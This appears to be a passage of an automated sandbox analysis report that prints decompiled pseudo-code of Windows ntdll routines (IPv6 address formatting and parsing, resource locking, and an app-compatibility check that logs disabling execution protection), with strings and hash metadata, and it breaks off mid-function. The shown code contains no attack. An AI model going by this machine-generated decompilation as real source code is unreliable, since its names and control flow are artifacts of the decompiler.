                                  						if(E025B5553(_t328,  &_v68,  &_v36) != 0) {
                                  							_a4 = _a4 + 1;
                                  						}
                                  						_v16 = _v12;
                                  						_t288 = E025AE679(_v12, _t332);
                                  						_pop(_t322);
                                  					}
                                  					_t296 = _v16;
                                  					if( *_v16 != _t318) {
                                  						E0259E2A8(_t322,  &_v68, _t296);
                                  						if(E025B5553(_t328,  &_v68,  &_v36) != 0) {
                                  							_a4 = _a4 + 1;
                                  						}
                                  					}
                                  					if(_a4 == _t318) {
                                  						E0259E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                  						_v48 = _t318;
                                  						_v28 = _t318;
                                  					}
                                  					if(_v8 != _t318) {
                                  						E0259E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                  					}
                                  					_v8 = _t318;
                                  					goto L17;
                                  				}
                                  			}

                                  APIs
                                  Strings
                                  • Kernel-MUI-Language-SKU, xrefs: 025B89FC
                                  • WindowsExcludedProcs, xrefs: 025B87C1
                                  • Kernel-MUI-Language-Allowed, xrefs: 025B8827
                                  • Kernel-MUI-Language-Disallowed, xrefs: 025B8914
                                  • Kernel-MUI-Number-Allowed, xrefs: 025B87E6
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                  • Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp
                                  Similarity
                                  • API ID: _wcspbrk
                                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                  • API String ID: 402402107-258546922
                                  • Opcode ID: c18dc0fc56fb19ac12e599fb4641d75fc57925eda29392d40a7628e04c8b00a6
                                  • Instruction ID: 48a7cfda28b5eb284bd86bec5e6f5d5a0913c5f28c6ee7c76abfc13b14a5ff61
                                  • Opcode Fuzzy Hash: c18dc0fc56fb19ac12e599fb4641d75fc57925eda29392d40a7628e04c8b00a6
                                  • Instruction Fuzzy Hash: 77F1F9B2D00209EFCF11DF98C985AEEBBB9FF48304F14546AE505A7250E7349A45DF64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 38%
                                  			E025D13CB(intOrPtr* _a4, intOrPtr _a8) {
                                  				char _v8;
                                  				intOrPtr _v12;
                                  				intOrPtr* _v16;
                                  				intOrPtr _v20;
                                  				char _v24;
                                  				intOrPtr _t71;
                                  				signed int _t78;
                                  				signed int _t86;
                                  				char _t90;
                                  				signed int _t91;
                                  				signed int _t96;
                                  				intOrPtr _t108;
                                  				signed int _t114;
                                  				void* _t115;
                                  				intOrPtr _t128;
                                  				intOrPtr* _t129;
                                  				void* _t130;
                                  
                                  				_t129 = _a4;
                                  				_t128 = _a8;
                                  				_t116 = 0;
                                  				_t71 = _t128 + 0x5c;
                                  				_v8 = 8;
                                  				_v20 = _t71;
                                  				if( *_t129 == 0) {
                                  					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                  						goto L5;
                                  					} else {
                                  						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                  						if(_t96 != 0) {
                                  							L38:
                                  							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                  								goto L5;
                                  							} else {
                                  								_push( *(_t129 + 0xf) & 0x000000ff);
                                  								_push( *(_t129 + 0xe) & 0x000000ff);
                                  								_push( *(_t129 + 0xd) & 0x000000ff);
                                  								_t86 = E025C7707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                  								L36:
                                  								return _t128 + _t86 * 2;
                                  							}
                                  						}
                                  						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                  						if(_t114 == 0) {
                                  							L33:
                                  							_t115 = 0x2592926;
                                  							L35:
                                  							_push( *(_t129 + 0xf) & 0x000000ff);
                                  							_push( *(_t129 + 0xe) & 0x000000ff);
                                  							_push( *(_t129 + 0xd) & 0x000000ff);
                                  							_push( *(_t129 + 0xc) & 0x000000ff);
                                  							_t86 = E025C7707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                  							goto L36;
                                  						}
                                  						if(_t114 != 0xffff) {
                                  							_t116 = 0;
                                  							goto L38;
                                  						}
                                  						if(_t114 != 0) {
                                  							_t115 = 0x2599cac;
                                  							goto L35;
                                  						}
                                  						goto L33;
                                  					}
                                  				} else {
                                  					L5:
                                  					_a8 = _t116;
                                  					_a4 = _t116;
                                  					_v12 = _t116;
                                  					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                  						if( *(_t129 + 0xa) == 0xfe5e) {
                                  							_v8 = 6;
                                  						}
                                  					}
                                  					_t90 = _v8;
                                  					if(_t90 <= _t116) {
                                  						L11:
                                  						if(_a8 - _a4 <= 1) {
                                  							_a8 = _t116;
                                  							_a4 = _t116;
                                  						}
                                  						_t91 = 0;
                                  						if(_v8 <= _t116) {
                                  							L22:
                                  							if(_v8 < 8) {
                                  								_push( *(_t129 + 0xf) & 0x000000ff);
                                  								_push( *(_t129 + 0xe) & 0x000000ff);
                                  								_push( *(_t129 + 0xd) & 0x000000ff);
                                  								_t128 = _t128 + E025C7707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                  							}
                                  							return _t128;
                                  						} else {
                                  							L14:
                                  							if(_a4 > _t91 || _t91 >= _a8) {
                                  								if(_t91 != _t116 && _t91 != _a8) {
                                  									_push(":");
                                  									_push(_t71 - _t128 >> 1);
                                  									_push(_t128);
                                  									_t128 = _t128 + E025C7707() * 2;
                                  									_t71 = _v20;
                                  									_t130 = _t130 + 0xc;
                                  								}
                                  								_t78 = E025C7707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                  								_t130 = _t130 + 0x10;
                                  							} else {
                                  								_push(L"::");
                                  								_push(_t71 - _t128 >> 1);
                                  								_push(_t128);
                                  								_t78 = E025C7707();
                                  								_t130 = _t130 + 0xc;
                                  								_t91 = _a8 - 1;
                                  							}
                                  							_t91 = _t91 + 1;
                                  							_t128 = _t128 + _t78 * 2;
                                  							_t71 = _v20;
                                  							if(_t91 >= _v8) {
                                  								goto L22;
                                  							}
                                  							_t116 = 0;
                                  							goto L14;
                                  						}
                                  					} else {
                                  						_t108 = 1;
                                  						_v16 = _t129;
                                  						_v24 = _t90;
                                  						do {
                                  							if( *_v16 == _t116) {
                                  								if(_t108 - _v12 > _a8 - _a4) {
                                  									_a4 = _v12;
                                  									_a8 = _t108;
                                  								}
                                  								_t116 = 0;
                                  							} else {
                                  								_v12 = _t108;
                                  							}
                                  							_v16 = _v16 + 2;
                                  							_t108 = _t108 + 1;
                                  							_t26 =  &_v24;
                                  							 *_t26 = _v24 - 1;
                                  						} while ( *_t26 != 0);
                                  						goto L11;
                                  					}
                                  				}
                                  			}

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                  • Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                  • API String ID: 48624451-2108815105
                                  • Opcode ID: af00593a3585537e40e099d5214638b9204e0096a9a688a8724429d6cd2f1b12
                                  • Instruction ID: 6d5766b2b32a0f4400b6704f703a9caa6e3736b187264bb8becfd9a5303c7972
                                  • Opcode Fuzzy Hash: af00593a3585537e40e099d5214638b9204e0096a9a688a8724429d6cd2f1b12
                                  • Instruction Fuzzy Hash: 946105B1900A56AADF34DFADC9809BEBFB6FF84300754C52DE59A47540D334A640CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 64%
                                  			E025C7EFD(void* __ecx, intOrPtr _a4) {
                                  				signed int _v8;
                                  				char _v540;
                                  				unsigned int _v544;
                                  				signed int _v548;
                                  				intOrPtr _v552;
                                  				char _v556;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				signed int _t33;
                                  				void* _t38;
                                  				unsigned int _t46;
                                  				unsigned int _t47;
                                  				unsigned int _t52;
                                  				intOrPtr _t56;
                                  				unsigned int _t62;
                                  				void* _t69;
                                  				void* _t70;
                                  				intOrPtr _t72;
                                  				signed int _t73;
                                  				void* _t74;
                                  				void* _t75;
                                  				void* _t76;
                                  				void* _t77;
                                  
                                  				_t33 =  *0x2672088; // 0x77fdf0e4
                                  				_v8 = _t33 ^ _t73;
                                  				_v548 = _v548 & 0x00000000;
                                  				_t72 = _a4;
                                  				if(E025C7F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
                                  					__eflags = _v548;
                                  					if(_v548 == 0) {
                                  						goto L1;
                                  					}
                                  					_t62 = _t72 + 0x24;
                                  					E025E3F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
                                  					_t71 = 0x214;
                                  					_v544 = 0x214;
                                  					E0259DFC0( &_v540, 0, 0x214);
                                  					_t75 = _t74 + 0x20;
                                  					_t46 =  *0x2674218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
                                  					__eflags = _t46;
                                  					if(_t46 == 0) {
                                  						goto L1;
                                  					}
                                  					_t47 = _v544;
                                  					__eflags = _t47;
                                  					if(_t47 == 0) {
                                  						goto L1;
                                  					}
                                  					__eflags = _t47 - 0x214;
                                  					if(_t47 >= 0x214) {
                                  						goto L1;
                                  					}
                                  					_push(_t62);
                                  					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
                                  					E025E3F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
                                  					_t52 = L025A0D27( &_v540, L"Execute=1");
                                  					_t76 = _t75 + 0x1c;
                                  					_push(_t62);
                                  					__eflags = _t52;
                                  					if(_t52 == 0) {
                                  						E025E3F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
                                  						_t71 =  &_v540;
                                  						_t56 = _t73 + _v544 - 0x218;
                                  						_t77 = _t76 + 0x14;
                                  						_v552 = _t56;
                                  						__eflags = _t71 - _t56;
                                  						if(_t71 >= _t56) {
                                  							goto L1;
                                  						} else {
                                  							goto L10;
                                  						}
                                  						while(1) {
                                  							L10:
                                  							_t62 = E025A8375(_t71, 0x20);
                                  							_pop(_t69);
                                  							__eflags = _t62;
                                  							if(__eflags != 0) {
                                  								__eflags = 0;
                                  								 *_t62 = 0;
                                  							}
                                  							E025E3F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
                                  							_t77 = _t77 + 0x10;
                                  							E0260E8DB(_t69, _t70, __eflags, _t72, _t71);
                                  							__eflags = _t62;
                                  							if(_t62 == 0) {
                                  								goto L1;
                                  							}
                                  							_t31 = _t62 + 2; // 0x2
                                  							_t71 = _t31;
                                  							__eflags = _t71 - _v552;
                                  							if(_t71 >= _v552) {
                                  								goto L1;
                                  							}
                                  						}
                                  					}
                                  					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                  					_push(3);
                                  					_push(0x55);
                                  					E025E3F92();
                                  					_t38 = 1;
                                  					L2:
                                  					return E0259E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
                                  				}
                                  				L1:
                                  				_t38 = 0;
                                  				goto L2;
                                  			}

                                  APIs
                                  • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 025E3F12
                                  Strings
                                  • Execute=1, xrefs: 025E3F5E
                                  • &q, xrefs: 025C7F1E
                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 025E3EC4
                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 025E3F4A
                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 025EE2FB
                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 025EE345
                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 025E3F75
                                  • ExecuteOptions, xrefs: 025E3F04
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                  • Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp
                                  Similarity
                                  • API ID: BaseDataModuleQuery
                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions$&q
                                  • API String ID: 3901378454-4097024812
                                  • Opcode ID: 5a42875e6b306f1d3faedce7fca214e7b41ba9fee36307dca22d3883ccbee2dc
                                  • Instruction ID: 3b822689b25480092df294637efd8dee6125b0289cc140f5ac885a91bfd36f44
                                  • Opcode Fuzzy Hash: 5a42875e6b306f1d3faedce7fca214e7b41ba9fee36307dca22d3883ccbee2dc
                                  • Instruction Fuzzy Hash: 1541BB7164031D7AEF24DAA4DCC5FEAB3BDBB58704F100499A505E6080F7709A458F69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E025D0B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
                                  				signed int _v8;
                                  				signed int _v12;
                                  				signed int _v16;
                                  				signed int _v20;
                                  				signed int _v24;
                                  				signed int _v28;
                                  				signed int _v32;
                                  				void* _t108;
                                  				void* _t116;
                                  				char _t120;
                                  				short _t121;
                                  				void* _t128;
                                  				intOrPtr* _t130;
                                  				char _t132;
                                  				short _t133;
                                  				intOrPtr _t141;
                                  				signed int _t156;
                                  				signed int _t174;
                                  				intOrPtr _t177;
                                  				intOrPtr* _t179;
                                  				intOrPtr _t180;
                                  				void* _t183;
                                  
                                  				_t179 = _a4;
                                  				_t141 =  *_t179;
                                  				_v16 = 0;
                                  				_v28 = 0;
                                  				_v8 = 0;
                                  				_v24 = 0;
                                  				_v12 = 0;
                                  				_v32 = 0;
                                  				_v20 = 0;
                                  				if(_t141 == 0) {
                                  					L41:
                                  					 *_a8 = _t179;
                                  					_t180 = _v24;
                                  					if(_t180 != 0) {
                                  						if(_t180 != 3) {
                                  							goto L6;
                                  						}
                                  						_v8 = _v8 + 1;
                                  					}
                                  					_t174 = _v32;
                                  					if(_t174 == 0) {
                                  						if(_v8 == 7) {
                                  							goto L43;
                                  						}
                                  						goto L6;
                                  					}
                                  					L43:
                                  					if(_v16 != 1) {
                                  						if(_v16 != 2) {
                                  							goto L6;
                                  						}
                                  						 *((short*)(_a12 + _v20 * 2)) = 0;
                                  						L47:
                                  						if(_t174 != 0) {
                                  							E025A8980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
                                  							_t116 = 8;
                                  							E0259DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
                                  						}
                                  						return 0;
                                  					}
                                  					if(_t180 != 0) {
                                  						if(_v12 > 3) {
                                  							goto L6;
                                  						}
                                  						_t120 = E025D0CFA(_v28, 0, 0xa);
                                  						_t183 = _t183 + 0xc;
                                  						if(_t120 > 0xff) {
                                  							goto L6;
                                  						}
                                  						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
                                  						goto L47;
                                  					}
                                  					if(_v12 > 4) {
                                  						goto L6;
                                  					}
                                  					_t121 = E025D0CFA(_v28, _t180, 0x10);
                                  					_t183 = _t183 + 0xc;
                                  					 *((short*)(_a12 + _v20 * 2)) = _t121;
                                  					goto L47;
                                  				} else {
                                  					while(1) {
                                  						_t123 = _v16;
                                  						if(_t123 == 0) {
                                  							goto L7;
                                  						}
                                  						_t108 = _t123 - 1;
                                  						if(_t108 != 0) {
                                  							goto L1;
                                  						}
                                  						_t178 = _t141;
                                  						if(E025D06BA(_t108, _t141) == 0 || _t135 == 0) {
                                  							if(E025D06BA(_t135, _t178) == 0 || E025D0A5B(_t136, _t178) == 0) {
                                  								if(_t141 != 0x3a) {
                                  									if(_t141 == 0x2e) {
                                  										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
                                  											goto L41;
                                  										} else {
                                  											_v24 = _v24 + 1;
                                  											L27:
                                  											_v16 = _v16 & 0x00000000;
                                  											L28:
                                  											if(_v28 == 0) {
                                  												goto L20;
                                  											}
                                  											_t177 = _v24;
                                  											if(_t177 != 0) {
                                  												if(_v12 > 3) {
                                  													L6:
                                  													return 0xc000000d;
                                  												}
                                  												_t132 = E025D0CFA(_v28, 0, 0xa);
                                  												_t183 = _t183 + 0xc;
                                  												if(_t132 > 0xff) {
                                  													goto L6;
                                  												}
                                  												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
                                  												goto L20;
                                  											}
                                  											if(_v12 > 4) {
                                  												goto L6;
                                  											}
                                  											_t133 = E025D0CFA(_v28, 0, 0x10);
                                  											_t183 = _t183 + 0xc;
                                  											_v20 = _v20 + 1;
                                  											 *((short*)(_a12 + _v20 * 2)) = _t133;
                                  											goto L20;
                                  										}
                                  									}
                                  									goto L41;
                                  								}
                                  								if(_v24 > 0 || _v8 > 6) {
                                  									goto L41;
                                  								} else {
                                  									_t130 = _t179 + 1;
                                  									if( *_t130 == _t141) {
                                  										if(_v32 != 0) {
                                  											goto L41;
                                  										}
                                  										_v32 = _v8 + 1;
                                  										_t156 = 2;
                                  										_v8 = _v8 + _t156;
                                  										L34:
                                  										_t179 = _t130;
                                  										_v16 = _t156;
                                  										goto L28;
                                  									}
                                  									_v8 = _v8 + 1;
                                  									goto L27;
                                  								}
                                  							} else {
                                  								_v12 = _v12 + 1;
                                  								if(_v24 > 0) {
                                  									goto L41;
                                  								}
                                  								_a7 = 1;
                                  								goto L20;
                                  							}
                                  						} else {
                                  							_v12 = _v12 + 1;
                                  							L20:
                                  							_t179 = _t179 + 1;
                                  							_t141 =  *_t179;
                                  							if(_t141 == 0) {
                                  								goto L41;
                                  							}
                                  							continue;
                                  						}
                                  						L7:
                                  						if(_t141 == 0x3a) {
                                  							if(_v24 > 0 || _v8 > 0) {
                                  								goto L41;
                                  							} else {
                                  								_t130 = _t179 + 1;
                                  								if( *_t130 != _t141) {
                                  									goto L41;
                                  								}
                                  								_v20 = _v20 + 1;
                                  								_t156 = 2;
                                  								_v32 = 1;
                                  								_v8 = _t156;
                                  								 *((short*)(_a12 + _v20 * 2)) = 0;
                                  								goto L34;
                                  							}
                                  						}
                                  						L8:
                                  						if(_v8 > 7) {
                                  							goto L41;
                                  						}
                                  						_t142 = _t141;
                                  						if(E025D06BA(_t123, _t141) == 0 || _t124 == 0) {
                                  							if(E025D06BA(_t124, _t142) == 0 || E025D0A5B(_t125, _t142) == 0 || _v24 > 0) {
                                  								goto L41;
                                  							} else {
                                  								_t128 = 1;
                                  								_a7 = 1;
                                  								_v28 = _t179;
                                  								_v16 = 1;
                                  								_v12 = 1;
                                  								L39:
                                  								if(_v16 == _t128) {
                                  									goto L20;
                                  								}
                                  								goto L28;
                                  							}
                                  						} else {
                                  							_a7 = 0;
                                  							_v28 = _t179;
                                  							_v16 = 1;
                                  							_v12 = 1;
                                  							goto L20;
                                  						}
                                  					}
                                  				}
                                  				L1:
                                  				_t123 = _t108 == 1;
                                  				if(_t108 == 1) {
                                  					goto L8;
                                  				}
                                  				_t128 = 1;
                                  				goto L39;
                                  			}

                                  Memory Dump Source
                                  • Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                  • Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp
                                  Similarity
                                  • API ID: __fassign
                                  • String ID: .$:$:
                                  • API String ID: 3965848254-2308638275
                                  • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                  • Instruction ID: 094c17f6aaa029459ab872151b7308a5b3f065f220acf84a0ea1f6b422279323
                                  • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                  • Instruction Fuzzy Hash: 22A18B7190420AEEDF34DF6CC8446BEBBB9BF45309F24886AD842A72E0D7349645CB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 49%
                                  			E025D0554(signed int _a4, char _a8) {
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				signed int* _t49;
                                  				signed int _t51;
                                  				signed int _t56;
                                  				signed int _t58;
                                  				signed int _t61;
                                  				signed int _t63;
                                  				void* _t66;
                                  				intOrPtr _t67;
                                  				signed int _t70;
                                  				void* _t75;
                                  				signed int _t81;
                                  				signed int _t84;
                                  				void* _t86;
                                  				signed int _t93;
                                  				signed int _t96;
                                  				intOrPtr _t105;
                                  				signed int _t107;
                                  				void* _t110;
                                  				signed int _t115;
                                  				signed int* _t119;
                                  				void* _t125;
                                  				void* _t126;
                                  				signed int _t128;
                                  				signed int _t130;
                                  				signed int _t138;
                                  				signed int _t144;
                                  				void* _t158;
                                  				void* _t159;
                                  				void* _t160;
                                  
                                  				_t96 = _a4;
                                  				_t115 =  *(_t96 + 0x28);
                                  				_push(_t138);
                                  				if(_t115 < 0) {
                                  					_t105 =  *[fs:0x18];
                                  					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
                                  					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
                                  						goto L6;
                                  					} else {
                                  						__eflags = _t115 | 0xffffffff;
                                  						asm("lock xadd [eax], edx");
                                  						return 1;
                                  					}
                                  				} else {
                                  					L6:
                                  					_push(_t128);
                                  					while(1) {
                                  						L7:
                                  						__eflags = _t115;
                                  						if(_t115 >= 0) {
                                  							break;
                                  						}
                                  						__eflags = _a8;
                                  						if(_a8 == 0) {
                                  							__eflags = 0;
                                  							return 0;
                                  						} else {
                                  							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                  							_t49 = _t96 + 0x1c;
                                  							_t106 = 1;
                                  							asm("lock xadd [edx], ecx");
                                  							_t115 =  *(_t96 + 0x28);
                                  							__eflags = _t115;
                                  							if(_t115 < 0) {
                                  								L23:
                                  								_t130 = 0;
                                  								__eflags = 0;
                                  								while(1) {
                                  									_t118 =  *(_t96 + 0x30) & 0x00000001;
                                  									asm("sbb esi, esi");
                                  									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x026701c0;
                                  									_push(_t144);
                                  									_push(0);
                                  									_t51 = E0258F8CC( *((intOrPtr*)(_t96 + 0x18)));
                                  									__eflags = _t51 - 0x102;
                                  									if(_t51 != 0x102) {
                                  										break;
                                  									}
                                  									_t106 =  *(_t144 + 4);
                                  									_t126 =  *_t144;
                                  									_t86 = E025D4FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
                                  									_push(_t126);
                                  									_push(_t86);
                                  									E025E3F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
                                  									E025E3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                  									_t130 = _t130 + 1;
                                  									_t160 = _t158 + 0x28;
                                  									__eflags = _t130 - 2;
                                  									if(__eflags > 0) {
                                  										E0261217A(_t106, __eflags, _t96);
                                  									}
                                  									_push("RTL: Re-Waiting\n");
                                  									_push(0);
                                  									_push(0x65);
                                  									E025E3F92();
                                  									_t158 = _t160 + 0xc;
                                  								}
                                  								__eflags = _t51;
                                  								if(__eflags < 0) {
                                  									_push(_t51);
                                  									E025D3915(_t96, _t106, _t118, _t130, _t144, __eflags);
                                  									asm("int3");
                                  									while(1) {
                                  										L32:
                                  										__eflags = _a8;
                                  										if(_a8 == 0) {
                                  											break;
                                  										}
                                  										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                  										_t119 = _t96 + 0x24;
                                  										_t107 = 1;
                                  										asm("lock xadd [eax], ecx");
                                  										_t56 =  *(_t96 + 0x28);
                                  										_a4 = _t56;
                                  										__eflags = _t56;
                                  										if(_t56 != 0) {
                                  											L40:
                                  											_t128 = 0;
                                  											__eflags = 0;
                                  											while(1) {
                                  												_t121 =  *(_t96 + 0x30) & 0x00000001;
                                  												asm("sbb esi, esi");
                                  												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x026701c0;
                                  												_push(_t138);
                                  												_push(0);
                                  												_t58 = E0258F8CC( *((intOrPtr*)(_t96 + 0x20)));
                                  												__eflags = _t58 - 0x102;
                                  												if(_t58 != 0x102) {
                                  													break;
                                  												}
                                  												_t107 =  *(_t138 + 4);
                                  												_t125 =  *_t138;
                                  												_t75 = E025D4FC0(_t125, _t107, 0xff676980, 0xffffffff);
                                  												_push(_t125);
                                  												_push(_t75);
                                  												E025E3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
                                  												E025E3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                  												_t128 = _t128 + 1;
                                  												_t159 = _t158 + 0x28;
                                  												__eflags = _t128 - 2;
                                  												if(__eflags > 0) {
                                  													E0261217A(_t107, __eflags, _t96);
                                  												}
                                  												_push("RTL: Re-Waiting\n");
                                  												_push(0);
                                  												_push(0x65);
                                  												E025E3F92();
                                  												_t158 = _t159 + 0xc;
                                  											}
                                  											__eflags = _t58;
                                  											if(__eflags < 0) {
                                  												_push(_t58);
                                  												E025D3915(_t96, _t107, _t121, _t128, _t138, __eflags);
                                  												asm("int3");
                                  												_t61 =  *_t107;
                                  												 *_t107 = 0;
                                  												__eflags = _t61;
                                  												if(_t61 == 0) {
                                  													L1:
                                  													_t63 = E025B5384(_t138 + 0x24);
                                  													if(_t63 != 0) {
                                  														goto L52;
                                  													} else {
                                  														goto L2;
                                  													}
                                  												} else {
                                  													_t123 =  *((intOrPtr*)(_t138 + 0x18));
                                  													_push( &_a4);
                                  													_push(_t61);
                                  													_t70 = E0258F970( *((intOrPtr*)(_t138 + 0x18)));
                                  													__eflags = _t70;
                                  													if(__eflags >= 0) {
                                  														goto L1;
                                  													} else {
                                  														_push(_t70);
                                  														E025D3915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
                                  														L52:
                                  														_t122 =  *((intOrPtr*)(_t138 + 0x20));
                                  														_push( &_a4);
                                  														_push(1);
                                  														_t63 = E0258F970( *((intOrPtr*)(_t138 + 0x20)));
                                  														__eflags = _t63;
                                  														if(__eflags >= 0) {
                                  															L2:
                                  															return _t63;
                                  														} else {
                                  															_push(_t63);
                                  															E025D3915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
                                  															_t109 =  *((intOrPtr*)(_t138 + 0x20));
                                  															_push( &_a4);
                                  															_push(1);
